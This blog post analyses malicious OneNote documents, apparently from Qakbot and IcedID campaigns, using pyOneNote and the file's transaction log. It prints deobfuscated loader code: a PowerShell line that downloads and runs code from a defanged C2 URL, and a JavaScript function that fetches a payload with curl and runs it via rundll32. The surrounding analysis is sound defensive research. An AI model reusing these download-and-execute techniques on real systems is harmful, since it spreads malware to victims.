OneNote Malware Analysis

OneNote Analysis

11 May 2023

By Jacob Pimental

OneNote documents are the latest trend for malware because they do not require macros to run the malware and very few tools can accurately parse the file format. This trend has been seen in distribution of Qakbot and Redline Stealer. While malware laced OneNote files may seem to only benefit criminals, there are a few benefits to the unique file format from a forensics perspective as well. This article will walk through analyzing basic OneNote malware using the pyOneNote tool from DissectMalware.


MD5 Name
b915056524f1b25937074727cdf5f87c file_5.hta
c9d2355fc2be90b0fa73ecb67061a77e file_1.hta
  1. Samples
  2. OneNote Format
    1. Sections
    2. Pages
    3. Outline
    4. Content
    5. Properties and Property Sets
    6. Transaction Log
    7. File Data Object
  3. Basic Analysis
    1. Analyzing Malicious Script
  4. Advantages of the Transaction Log
    1. File_5.hta Analysis
    2. File_1.hta
  5. Conclusion
  6. IOCs
    1. Network Indicators
    2. Samples
  7. Mitre ATT&CK IDs

OneNote Format

OneNote documents consist of sections, pages, outlines, and content, each having their own metadata and attributes. Details of the MS-ONE file format can be found in the specification documents from Microsoft. Below is a brief overview of the structure:

Structure of OneNote Document Structure of OneNote Document


Sections contain pages, metadata, and properties for the OneNote document. This is what gets exported as a .one file when saving from OneNote. It contains properties such as which pages are contained within the section, the order of those pages, and the name of the section.


Pages contain the actual content of the OneNote document. This includes text, images, tables, and outlines. Some of the properties associated with a page include the author, the width and height of the page, the last modified timestamp, and if this is the first page in the section.


Outlines are a convenient way to group elements together. You can think of outlines like a mini container that stores text, images, tables, file references, etc. Outlines can be placed anywhere on a page and are even allowed to overlap with each other. Outlines have properties associated with their height, width, and their location on the page.


Content is the actual text, images, tables, and data files that go into pages and outlines. Each content element has its own set of unique properties and values.

Properties and Property Sets

All content within a OneNote document contains a series of properties associated with the element. Property sets are the groups of properties that make up an element, and are often prepended with jcid, a structure specific to OneNote documents. The property sets within a OneNote file describe the types of elements within that file and how to parse them. Properties are the individual metdata values contained within a property set.

Transaction Log

The transaction log is a special metadata object within a OneNote document that will keep track of changes. This allows the user to view previous versions of a document and see when they were edited. For an analyst, the transaction log can help find additional IOCs associated with a sample and identify previous campaigns the file might have been used in.

File Data Object

A file data object is a special element that contains a binary stream for the type of file it represents. This can be used maliciously by including malicious scripts or executables that can run when a user double-clicks on them. When a file data object is added to a OneNote document, it displays as the .ico of the application that will run the file as shown in the screenshot below:

File Data Object File data object of .hta file

Basic Analysis

Taking a look at we can verify with trid that this is a OneNote document:

trid identifying onenote trid identifying the file as a .one document

Because there is no OLE data like in normal Office documents, we cannot use oletools to parse this file. This is where pyOneNote comes in. pyOneNote will parse the contents of the transaction log and list the changes made in the document. The tool will also extract any embedded files and write them to the directory specified by the -o flag. For example, in the screenshot below pyOneNote is being used to extract embedded files to the “extracted_files” directory.

alt Running pyOneNote on document

The output makes it clear that several files were pulled from the OneNote document. Three of these files are PNGs that look like they are used to trick a user into clicking a link. The fourth file is JavaScript whose original file path was C:\Autoruns\output1.js. The metadata from the script tells us that the language of the script is set to Russian, and that the alt text for the image NOTE4_WHITE_1.bmp is Russian text that translates to:

Auto-generated alt text:
Connect to the cloud 
This document contains attachments from the cloud 
to receive them, double click "Next" 

Embedded JS File Embedded JavaScript file information showing the Russian Language ID and name of file

Embedded image information Information about the embedded image including the alt text and name of image file

Actual embedded image Image embedded in OneNote Document

Looking at the list of properties found by pyOneNote, we can see a jcidEmbeddedFileNode that matches the output1.js file. This tells us that the author of the document embedded the script to the document so that when a user clicks on it Windows will open the script in the appropriate application - wscript in this case. Thanks to the transaction log, we see the date the script was embedded: 2023-03-17 13:37:19.

jcidEmbeddedFileNode property jcidEmbeddedFileNode property showing the date value

Analyzing Malicious Script

Now that we know that there is an embedded script and have it extracted with pyOneNote, we begin our analysis. To do this quickly, I am going to use a slightly modified version of box-js, a JavaScript emulator that comes with Remnux. I can launch the malicious script in the emulator using the command:

box-js extracted_files/file_3.js --download

We can see that the script attempts to reach out to multiple C2s and write what looks to be a zip file. It will then extract that file to a new folder and run the unzipped file via regsvr32.exe.

box-js results showing C2 connection, file being written, and regsvr32.exe execution box-js analysis results

This shows the power of emulation over having to manually analyze the file. Upon further analysis, the downloaded payload is Emotet, but that is outside the scope of this article.

Advantages of the Transaction Log

The transaction log is extremely useful when analyzing OneNote documents. It allows us to view the changes the document went through and can help us find additional IOCs associated with the sample. For example, when running through pyOneNote you will notice that it extracts two .hta files. It’s initially unclear which one of these files will execute when the user opens the file, but with the help of the transaction log we can see if there were any changes made to these .hta files.

Using the following gawk command on the output of pyOneNote, I was able to pull out only the jcidEmbeddedFileNode properties and their corresponding .hta file.

gawk -v n=8 '{ if( match($0, /\s+(jcid[^\(]+)\(/, arr) ) { if( arr[1]~/jcidEmbeddedFileNode/ ) { print arr[1]; for( i=1; i<=n; i++ ) getline; print; } } }' output.txt

Changes made to embedded files List of embedded filenames in the .one document

Based on the output in the screenshot above, we can see that there was a change in the embedded files from Z:\build\one\Open.hta to C:\Users\Admin\Desktop\Open.hta on February 3rd, 2023. We can infer that the latest version of the .hta file is the expected payload for the sample and can continue our analysis from there.

File_5.hta Analysis

The latest version of the .hta file was extracted as pyOneNote as file_5.hta. This file contains VBScript code that will loop through each index of an array of decimal values and subtract that value from the char value of a large blob of text. The output of this is then run through the execute function of VBScript if the folder c:usersta does not exist. One thing to note is that c:usersta is not a valid folder name. The author of the script most likely used that name so that the malware will always run.

First round of obfuscation in file_5.hta First round of obfuscation in file_5.hta

The decoded output runs an encoded PowerShell command that deobfuscates to:

IEX (New-Object Net.Webclient).downloadstring("http://corsanave[.]top/gatef.php")

This will download a file at http://corsanave[.]top/gatef.php which at the time of writing is down but was associated with IcedID according to this report from Joes Sandbox.

Encoded PowerShell script run by file_5.hta Encoded PowerShell run by file_5.hta


After analyzing file_5.hta, we should analyze the previous version of the .hta file to fully understand the threat and identify additional IOCs. The previous version of the file was extracted by pyOneNote as file_1.hta. In it, we can see an entirely different version of the .hta file we looked at previously. This version is written in JavaScript as opposed to VBScript and uses a different method of obfuscation.

When first looking at the file we notice a div section defined containing an obfuscated string. We then see the content of this div being written to the registry key HKCU\SOFTWARE\Andromedia\Mp4ToAvi\Values.

Creating div and writing output to registry key Creating div and writing content to registry key

Next, the JavaScript will take the value from that registry key, remove all occurrences of 5& and use the decoded value to create a function. Using Cyberchef, we can see that this function will take a URL as an argument. It will then download a file from that URL using curl.exe and output it into C:\ProgramData\index1.png. Finally, the function will execute the downloaded file using rundll32.exe with the function Wind. The decoded JavaScript function is below:

function sleep(millis) {
    var date = new Date();
    var curDate = null;
    do { 
        curDate = new Date(); 
    }while(curDate - date < millis);
/** var url = ""; */
new ActiveXObject("").run("curl.exe --output C:\\ProgramData\\index1.png --url " + url, 0);
var shell = new ActiveXObject("shell.application");
shell.shellexecute("rundll32", "C:\\ProgramData\\index1.png,Wind", "", "open", 3);

In the above snippet, we see that a comment was left in for testing the function with the URL “”.

After the Wind function is created, it is run with the hard-coded parameter https://unitedmedicalspecialties[.]com/T1Gpp/OI.png. At the time of writing, this C2 is down but is associated with Qakbot according to this report by Esentire.

Finally, the .hta file will delete the registry key it created using VBScript.

Creatin new function and grabbing payload Creation of new function and grabbing payload


Thanks to tools like pyOneNote, analyzing OneNote documents can be done without needing the actual OneNote application installed on your machine. This is useful for those without a Microsoft-365 subscription or without access to a Windows machine. We also used the transaction log associated with OneNote documents to extract a previous version of the payload that was associated with a different campaign entirely! This leads us to believe that whoever wrote the IcedID payload might have used a copy of the Qakbot payload as a template.

Thanks for reading and happy reversing!


Network Indicators

Sample 1
Sample 2


MD5 Name
b915056524f1b25937074727cdf5f87c file_5.hta
c9d2355fc2be90b0fa73ecb67061a77e file_1.hta

Mitre ATT&CK IDs

ID Name
T1071.001 Application Layer Protocol: Web Protocols
T1218.010 System Binary Proxy Execution: Regsvr32
T1105 Ingress Tool Transfer
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File
T1112 Modify Registry
T1218.011 System Binary Proxy Execution: Rundll32

OneNote, Malware Analysis, Tutorial, Automation

More Content Like This: